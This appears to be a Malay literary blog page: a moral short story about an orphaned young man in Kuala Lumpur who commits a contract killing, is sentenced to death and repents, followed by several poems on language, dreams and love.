Rembang kian berselaput awan-awan putih yang berarak bosan. Senja merasuk langit bandar metropolitan Kuala Lumpur dengan jalur jingga bertampal merah. Sedari Asar tadi lagi Hamad menghabiskan masa berkeliaran di sekitar bangunan itu. Tidak senang duduk, ada saja dia berjalan ke hulu ke hilir sambil mata melilau-lilau seperti orang gila hilang baju. Sekali bersandar di dinding, merokok tepi longkang, cangkung tepi tong sampah. Titis-titis peluh basah timbul di dahinya yang bergaris-garis menerbitkan kebimbangan. Entah apa yang dirisaukannya. Pantas detik waktu, jantung Hamad berdegup kencang umpama taufan. Sungguh kencang! Sebilah pisau ‘rambo’ yang disisipnya dalam poket ‘jeans’nya dikeluarkan. Hamad masih menunggu kelibat lembaga yang dinanti. Digenggamnya erat-erat pisau itu, takut terlucut kelak tak jadi kerja fikirnya. Iya. Mudah saja Hamad, jangan risau. Kerjakan, sembunyikan bukti dan beredar. Bisik sisi gelap hatinya bergema di gegendang telinga. Mudah saja, lepas ni ambil wang upah boleh duduk senang dua tiga bulan. Sewa rumah pun belum langsai lagi. Dia juga sudah penat menadah telinga mendengar pekik terlolong tuan rumah. Fikirnya lagi.

Nauzubillah! Resah hati Hamad siapa yang tahu? Hidupnya sering saja dicakar resah, sering saja dicalarkan gelisah. Tuhan! Kerjanya Sang Izrail! Alangkah besarnya dosa yang ditanggung. Betapa tidak sanggup lagi Hamad meneruskan. Dia seringkali ingin menitiskan noktah setelah segala dosa yang sudah menggunung tak tertanggung. Tetapi Hamad juga sering mewajarkan kerjanya itu sebagai kerja yang suci. Sebagai ikhtiar rezeki hidupnya. Wajar bukan? Aku hanya inginkan sedikit wang untuk duduk senang, ini sajalah kerja yang aku tahu. Itulah yang Hamad sering pacakkan dalam pendiriannya yang bersebati dengan nafsu nafsi dan fatwa ciptaan sendiri. Hamad tidak mampu menidakkan bahawa dia tidak punya apa-apa. Yatim piatu, tak berumah, tak berharta, tak berkeluarga. Hamad perlukan sesuatu untuk dimiliki. Apa-apa sajalah. Kerana setiap detik dia merungut dengan ketentuan. Hamad semakin bosan dengan percaturan Tuhan. Terlalu rumit, sukar diduga. Aduhai.

Hamad juga tahu dunia sekarang ini semakin mencabar kredibilitinya sebagai manusia. Lihat saja perempuan, samada yang mata sepasang atau dua pasang, bertudung atau bersanggul unta semuanya melilau-lilau mencari lelaki yang berharta. Semuanya sekarang sudah mahu pakai duit. Apa dalam Berita Harian kata materialistik? Iya. Materialistik. Terlalu mementingkan kebendaan. Mahu pakai mewah, makan mewah, hidup mewah, ibadah tiada mewah-mewah. Hamad tahu itu semua dari akhbar, peti televisyen kedai Mak Som. Bahkan sekarang ini mahu kencing berak pun sudah kena bayar. Dunia apa ini? Sudahlah. Hamad berdiskusi sendirian. Apapun hiruk-pikuk kota inilah yang mendewasakan Hamad dengan baik buruk yang semua Hamad cerna.

Ketika Hamad berusia 12 tahun, Hamad dibawa ke Kuala Lumpur oleh kakaknya. Kakaknya pulang ke kampung, bawa Hamad ke Kuala Lumpur. Itupun selepas umi,walid dan Tok Pah mati dalam kebakaran. Semuanya sudah tinggal abu. Hamad seorang saja yang selamat ketika itu kerana Hamad pergi memancing ikan bersama rakan-rakannya di bujuk. Pulang saja, semuanya sudah tinggal abu. Umi,walid dan Tok Pah pun jadi abu. Semuanya hangus! Kak Milah terpaksa membawa Hamad tinggal bersama di kotaraya. Hamad tidak lagi bersekolah selepas itu. Dunianya seakan hilang punca. Bisu kelu tanpa suara.

Kak Milah kerja petang pulang pagi. Hamad pun kurang jelas dengan kerja Kak Milah. Dia tidak tahu apa-apa. Dua hari menapak di kotaraya yang gah ini, Kak Milah membuat keputusan untuk menghantar Hamad bekerja di kedai makan Mak Som. Suruh kerja jadi kuli. Terperap di rumah pun sia-sia juga, bukannya sekolah pun si Hamad tu. Kerjalah si Hamad itu lebih kurang 5 tahun setengah. Basuh pinggan mangkuk, ambil pesanan, masak di dapur. Semuanya Hamad sudah hafal satu-satu. Kalau diberi peluang Hamad buka kedai makan, sudah pasti Hamad kerja seorang sahaja sebab kerjanya sangat rajin. Cepat pula tu. Mak Som sering puji Hamad depan Kak Milah. Kak Milah angguk-angguk beruk saja.

Dalam tempoh lima tahun itu jugalah Hamad belajar banyak perkara dari Mak Som, Achop, Johan dan rakan-rakannya di lorong. Hamad mula berjinak-jinak dengan rokok, dadah, gam. Semuanya Hamad sudah cuba. Sebut saja kanabis, ectasy, pil kuda, daun ketum, cerut, atau apa-apa saja. Hamad sudah cukup arif, dia sudah hafal satu-satu benda-benda itu. Rokok pun sudah mula lekat di mulutnya. Kalau demam, tak usah makan ubat ada rokok saja boleh sihat.

Dalam tempoh lima tahun ini juga Hamad akhirnya tahu apa sebenarnya kerja Kak Milah. Pada suatu hari, Hamad terlalu ingin tahu apa kerjanya Kak Milah. Hamad selalunya balik kerja kedai makan Mak Som pukul 6, tapi Hamad minta dengan Mak Som balik pukul 5. Dalam perjalanan pulang, Hamad ternampak Kak Milah berjalan di suatu lorong. Si Hamad terus pergi ikut Kak Milah dari belakang. Ketika itu sudah pukul 6.30 petang. Lampu-lampu neon, lampu jalan sudah mula menerangi Kuala Lumpur. Tapi Hamad tidak tahu kenapa lorong itu semakin gelap dan terus gelap. Tiba di suatu tempat, Kak Milah belok ke kanan. Hamad pun ikut sama belok ke kanan. Kak Milah berhenti di situ, lalu berjalan menghampiri beberapa orang lelaki. Hamad buat selamba menyorok belakang kereta buruk yang diparkir di lorong itu. Dilihatnya Kak Milah dipeluk-peluk beberapa orang lelaki. Kemudian tubuhnya diraba-raba dan diperkosa sesuka hati. Hamad menekup mukanya dan terus berlari jauh dari lorong itu. Hatinya hancur berderai melihat satu-satunya saudara kandungnya memperlakukan kerja yang hina sedemikian.

Hamad sering menyalahkan Tuhan. Mengapa umi,walid,Tok Pah dan Kak Milah diambil pergi? Kenapa? Hamad tidak tahan dengan dugaan ini. Suasana sekitarnya dipenuhi golongan muda remaja yang rosak akhlak. Masyarakatnya tenggelam dengan dunia yang terlalu materialistik. Mementingkan kebendaan. Dunia ini gila! Tegas hati Hamad, dia tidak ingin hidup dalam dunia ini. Namun, kuasa Tuhan memanjangkan umurnya. Dia dipilih untuk menghadapi dugaan ini. Dia telah lihat umi,walid, Tok Pah dan Kak Milah diambil Tuhan. Kak Milah mati kena rogol dengan bapak ayam. Umi, walid, Tok Pah rentung dalam kebakaran. Hamad sudah bosan dengan percaturan Tuhan! Arghhhhhh!!! Dia berteriak dalam dirinya.

Mata Hamad melilau di sekeliling tempat itu. Kali ini Bahar, abang long Kampung Baru menyuruhnya menikam Lokan. Lokan itu kononnya peniaga dadah yang baru datang ke kawasan tersebut. Bahar berasa terancam dan marah dengan perlakuan Lokan lalu menyuruh Hamad membunuh Lokan. Pisau dalam genggamannya terus dipegang erat. Derup kaki seseorang mengalihkan perhatian Hamad. Hamad beralih ke suatu sudut. Itu Lokan!
Dengan pisau di dalam tangannya, Hamad lantas menghayun pisau tersebut tepat mengenai tulang rusuk kanan Lokan. Lokan terjelepok ke lantai memuntahkan darah yang masih tersisa di dalam tubuhnya. Hamad pantas menarik jasad Lokan ke timbunan sampah sarap yang berada berhampiran longkang di suatu sudut lorong itu. Pisau yang tertusuk di tulang rusuk Lokan itu dicabut semula. Hamad duduk bersandar sebentar sambil mengeluarkan sebatang rokok kemudian mencucuhnya dengan pemetik api.

“Lokan, lu manyak kesian ma. Baru mali sudah kena lipat.”

Hamad kemudian menimbunkan tubuh Lokan yang sudah tidak bernyawa itu dengan kepingan-kepingan kotak dan sampah-sarap yang ada berhampiran. Sebotol minyak tanah dicurahkan ke atas timbunan tersebut lalu dibakar. Misi Hamad selesai. Dia membalut pisau yang digunakan dengan elok lantas disimpan kedalam poket ‘jeans’nya. Hamad berlalu dari lorong itu dengan sedikit hampa dan rasa yang berdosa tanpa menyedari ada orang yang memerhatikan gerak-gerinya.

Semua itu Hamad ingat satu persatu. Dibeleknya kembali memori pahit getir kehidupannya di Kuala Lumpur. Kota inikah yang membakarnya dengan bara dosa dan api kejahilan? Atau dia sendiri yang menempah tiket neraka di kota ini. Dia sebak. Memikirkan dirinya yang jahil. Malah menyalahkan Tuhan. Aduhai! Hati Hamad kian sebak.Dia terus mengalunkan istighfar kepada Tuhan. Tuhan, ampunkan dosaku Tuhan!

“Apa yang telah kamu lakukan ini Hamad?”

“Apa dia Liza? Apa yang kau maksudkan?”

“Hamad…Kenapa sampai sanggup mencabut nyawa Hamad? Kita bukan Tuhan. Yang menentukan kematian ini kerja Tuhan Hamad. Hamad, taubatlah Hamad. Bukan Hamad ada janji dengan Liza mahu berubah?”

Hamad diam mendengar penjelasan Aliza. Hatinya mengendur, kembung kempis. Terasa bagai ada batu yang besar menghempap kepalanya. Hamad dengarkan saja kata-kata Aliza, baginya Aliza sahajalah segalanya buat masa ini. Alizalah yang menemani Hamad meskipun Hamad tampak jahat, tetapi Aliza memberanikan diri berkawan dengan Hamad. Katanya Hamad kelihatan baik padanya. Hamad juga menyimpan perasaan terhadap Liza.

“Liza…Maafkan Hamad, bukan kehendak Hamad.”

Dia menitiskan airmatanya. Sebak. Terlalu banyak dosa yang dia lakukan di bumi Tuhan ini. Menyedari setiap cebis nikmat ini adalah milik-Nya, Hamad tunduk ke tanah. Butir-butir air seakan kaca lantas memenuhi kantung airmatanya. Terlalu penuh seakan sudah mahu tumpah ke tanah.

“Hamad, mohonlah ampun dengan Tuhan.”

Sebuah kereta polis berhenti di depan kedai makan Mak Som. Dua orang anggota polis berbadan tegap keluar menggari Hamad yang hanya mampu kaku di atas bangku. Tubuhnya lembik seperti biskut yang dicelup dalam teh panas. Hatinya sebak melangit. Tuhan! Aliza hanya menitiskan airmata sambil menyaksikan kereta-kereta itu meluncur diatas jalanraya, lenyap dari pandangannya.

Beberapa minggu setelah penangkapan Hamad, beberapa orang lagi orang bawahan Bahar dan juga Bahar ditangkap. Pada hari perbicaraan, Aliza merupakan saksi tunggal kes pembunuhan Lokan. Setiap soalan yang ditanyakan peguam dijawab dengan jujur meskipun pahit hati menahan.

“Pahit untuk aku menyatakan semua ini Hamad.”

 Hamad hanya kaku di kandang mahkamah. Dia tunduk rapat ke lantai seakan lantai itu sudah tembus dengan pandangannya. Hasil perbicaraan, Hamad dijatuhkan hukuman mati mandatori oleh pihak mahkamah atas kesalahan membunuh dengan niat. Setitik dua air mata tergelincir lalu jatuh membasahi baju dan wajah Hamad. Oh Tuhan!

Alunan keinsafan kian menyibak ke dalam hatinya, kemudian menerangi seluruh alam bawah sedarnya dengan cahaya hidayah yang melampau terangnya. Hamad sedar akan hakikat dia bukan lagi Izrail, dan dia bukan Izrail. Bukan. Dia silap selama ini. Melebihkan diri sebagai Tuhan mutlak kepada dirinya sendiri. Dia bertuhankan nafsu! Aduhai. Alangkah beratnya dosa ini Tuhan. Jiwanya berteriak. Semakin sebak hati Hamad berintihan tatkala tebing mulutnya deras mengucap tahmid dan tasbih. Hanyut dalam kehibaan yang terlalu kuat, dia lantas bersujud kepada Tuhan memohon ampun. Alangkah berdosanya aku. Alangkah!

Sarwa jiwanya diapungkan dilautan keinsafan untuk menenangkan diri. Sambil airmata yang deras bercucuran, Hamad teringat akan kata-kata Aliza kepadanya. Dia tidak lupa. Tidak. Mana mungkin setiap patah kata Liza dilupakan. Dia masih ingat akan kata-kata itu. Masih segar bugar di gudang memorinya.

“Hamad…Hamad sayang Liza kan? Berubahlah Hamad. Tinggalkan kerja-kerja haram itu. Liza boleh minta tolong Pak Hamid di kedai basikal itu berikan Hamad kerja kalau Hamad mahu. Rezekinya pun halal.”

“Biarlah Liza. Hamad sudah biasa dengan semua ini. Barangkali suatu hari nanti Hamad akan berubah.”

“Inshaallah Hamad. Moga-moga Tuhan permudahkan urusan hidup Hamad. Amin.”

“Moga-moga.”

“Jemputlah taubat Hamad… Sebelum taubat menjemput.”

Tuhan!!!
Berat benar hati Hamad. Kepalanya terus dirapatkan ke lantai. Moga-moga taubatnya diterima Tuhan. Aduhai. Hamad terus menerus beristighfar di dalam hati dan di bibirnya. Biarlah malam itu dia tidak tidur kerana di hari esok dia bakal tidur nyenyak untuk selamanya.

Rimbahasa


rimba bahasa,sajak,ak kelana,kelana cinta
Sungguh kaya disini
Tanah sarwa karya, semak belukar puisi
Terhimpun disini adalah untaian kata murni
Dilantai tertanam erti, buat pertapa yang mencari.

Menapak merapati gerbangmu
Serunai bambu syair pujangga bersenandung
Pekik-pekik hati akustiknya emosi pendeta
Bersebati dalam seribu makna erti rerangkap baris kata.

Setiap inci selirat akar meranti
Menaruh sebuah pusaka bangsa
Aksara-aksara kemilau bahasa mulia
Merewang sebagai khazanah sejuta tahun.

Sesungguhnya rimba ini
Lombong emas nusa
Tasik punca bangsa
Ditempa menjadi keris dan parang berseni padu
Diteguk melangsai dahaga kerongkong pendeta.

Diasah keris ini dihunus ke leher seteru
Ajak berbahas, berbahasa sama kita
Lestarikan bahasa ini menjadi tutur nafas
Semerbak wangian kasturi memuncak keluhuran.

Rimba bahasa
Tutur nafas pertiwi
Pusaka silam abadi.
Diselam makna erti tersembunyi
Keindahan melangit tinggi.

Kalau Selama Ini Aku Bermimpi

mimpi,sajak,ak kelana,kelana cinta

Kalau selama ini aku menyangka aku bermimpi,
Jagakan aku dari sejenak mimpi yang Kau beri,
Renjislah aku dengan gerimis yang selalu mengintai aku dibalik awan-Mu.

Kalau selama ini aku menyangka aku bermimpi,
Bangkitkan aku daripada igauan-Mu ini,
Simbahlah aku dengan kocakan air dari langit-Mu yang tidak bertepi.

Merendahlah
Seperti bintang di atas langit
Berkelip tanpa henti
Di atas air ia nampak dekat
Padahal ia tinggi sekali
Dan janganlah kita seperti asap
Membumbung tinggi
Menembus ke awan membangga diri
Padahal ia rendah tiada erti.


Atikah Nazirah Latep

Gesekan Mimpi

mimpi,biola,gesekan mimpi,sajak,kelana cinta
Sekuntum senyum mentari ditabir pagi
merapat aku ke jendela menyambut nyanyian kelincap
di reranting bourgeinvilla
dan sapaan akustik aroma kemboja
terlalu asyik di sini
kebebasan
ketenangan
mencari manis madu
dari seroja sampai ke tangkai delima
untuk membenih sarwa perasaan
menjadi cinta tumbuh membunga
berbisik irama nada cinta
menggubah lagu rindu
atau madu cinta narwastu
semuanya indah namun
sayang ini sekadar gesekan mimpi.

Cinta Dalam Puisi

cinta dalam puisi,sajak,kelana cinta,ak kelana
Kulakarkan satu puisi
Dengan kiasan kata-kata indah
Bertatah mutiara aksara
Frasa demi frasa kubina
Baris awal pemula
Baris akhir mengirai tirainya.

Puisi pada kalam
Bukan hati yang berbalam-balam
Bukan bahasa kelam
Ini tanah menyemadi rasa
dan disini jua cinta diseru
sahut menyahut

Cinta dalam puisi
Rintihku hanya pada kertas
Sepiku tertelan dakwat pada pena
Senyumku bertitis di noktah
Kalam hati ilham diri
Seribu makna sejuta erti

Puisi dalam cinta
Cinta dalam puisi.